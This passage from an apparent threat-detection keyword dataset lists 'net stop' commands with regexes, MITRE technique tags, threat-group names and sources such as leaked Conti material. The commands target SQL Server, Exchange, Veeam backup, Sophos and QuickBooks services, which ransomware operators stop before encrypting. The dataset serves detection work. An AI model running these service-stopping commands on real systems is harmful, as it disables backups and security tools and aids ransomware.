Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MsDtsServer110*",".{0,1000}net\sstop\sMsDtsServer110.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - 
GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSExchangeADTopology*",".{0,1000}net\sstop\sMSExchangeADTopology.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop MSExchangeFBA*",".{0,1000}net\sstop\sMSExchangeFBA.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop MSExchangeIS*",".{0,1000}net\sstop\sMSExchangeIS.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - 
menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop MSExchangeSA*",".{0,1000}net\sstop\sMSExchangeSA.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop msftesql$PROD*",".{0,1000}net\sstop\smsftesql\$PROD.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSOLAP$SQL_2008*",".{0,1000}net\sstop\sMSOLAP\$SQL_2008.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - 
Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSOLAP$SYSTEM_BGC*",".{0,1000}net\sstop\sMSOLAP\$SYSTEM_BGC.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSOLAP$TPS*",".{0,1000}net\sstop\sMSOLAP\$TPS.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSOLAP$TPSAMA*",".{0,1000}net\sstop\sMSOLAP\$TPSAMA.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSSQL$BKUPEXEC*",".{0,1000}net\sstop\sMSSQL\$BKUPEXEC.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSSQL$CONTOSO1*",".{0,1000}net\sstop\sMSSQL\$CONTOSO1.{0,1000}","greyware_tool_keyword","net","VoidCrypt ransomware","T1486 - T1490","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - 
Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","N/A","10","3","294","43","2024-08-30T12:07:16Z","2021-07-28T21:00:52Z" "*net stop MSSQL$ECWDB2*",".{0,1000}net\sstop\sMSSQL\$ECWDB2.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSSQL$ISARS*",".{0,1000}net\sstop\sMSSQL\$ISARS.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop MSSQL$MSFW*",".{0,1000}net\sstop\sMSSQL\$MSFW.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - 
APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop MSSQL$PRACTICEMGT*",".{0,1000}net\sstop\sMSSQL\$PRACTICEMGT.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSSQL$PRACTTICEBGC*",".{0,1000}net\sstop\sMSSQL\$PRACTTICEBGC.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop 
MSSQL$PROD*",".{0,1000}net\sstop\sMSSQL\$PROD.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSSQL$PROFXENGAGEMENT*",".{0,1000}net\sstop\sMSSQL\$PROFXENGAGEMENT.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSSQL$SBSMONITORING*",".{0,1000}net\sstop\sMSSQL\$SBSMONITORING.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE 
BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSSQL$SHAREPOINT*",".{0,1000}net\sstop\sMSSQL\$SHAREPOINT.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSSQL$SOPHOS*",".{0,1000}net\sstop\sMSSQL\$SOPHOS.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSSQL$SQL_2008*",".{0,1000}net\sstop\sMSSQL\$SQL_2008.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 
- APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSSQL$SQLEXPRESS*",".{0,1000}net\sstop\sMSSQL\$SQLEXPRESS.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSSQL$SYSTEM_BGC*",".{0,1000}net\sstop\sMSSQL\$SYSTEM_BGC.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop 
MSSQL$TPS*",".{0,1000}net\sstop\sMSSQL\$TPS.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSSQL$TPSAMA*",".{0,1000}net\sstop\sMSSQL\$TPSAMA.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSSQL$VEEAMSQL*",".{0,1000}net\sstop\sMSSQL\$VEEAMSQL.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSSQL$VEEAMSQL*",".{0,1000}net\sstop\sMSSQL\$VEEAMSQL.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MSSQLServerADHelper100*",".{0,1000}net\sstop\sMSSQLServerADHelper100.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop MSSQLServerADHelper100*",".{0,1000}net\sstop\sMSSQLServerADHelper100.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - 
admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop QBCFMonitorService*",".{0,1000}net\sstop\sQBCFMonitorService.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop QBPOSDBServiceV12*",".{0,1000}net\sstop\sQBPOSDBServiceV12.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop QBVSS*",".{0,1000}net\sstop\sQBVSS.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - 
Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop QuickBooksDB1*",".{0,1000}net\sstop\sQuickBooksDB1.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop QuickBooksDB2*",".{0,1000}net\sstop\sQuickBooksDB2.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop QuickBooksDB3*",".{0,1000}net\sstop\sQuickBooksDB3.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - 
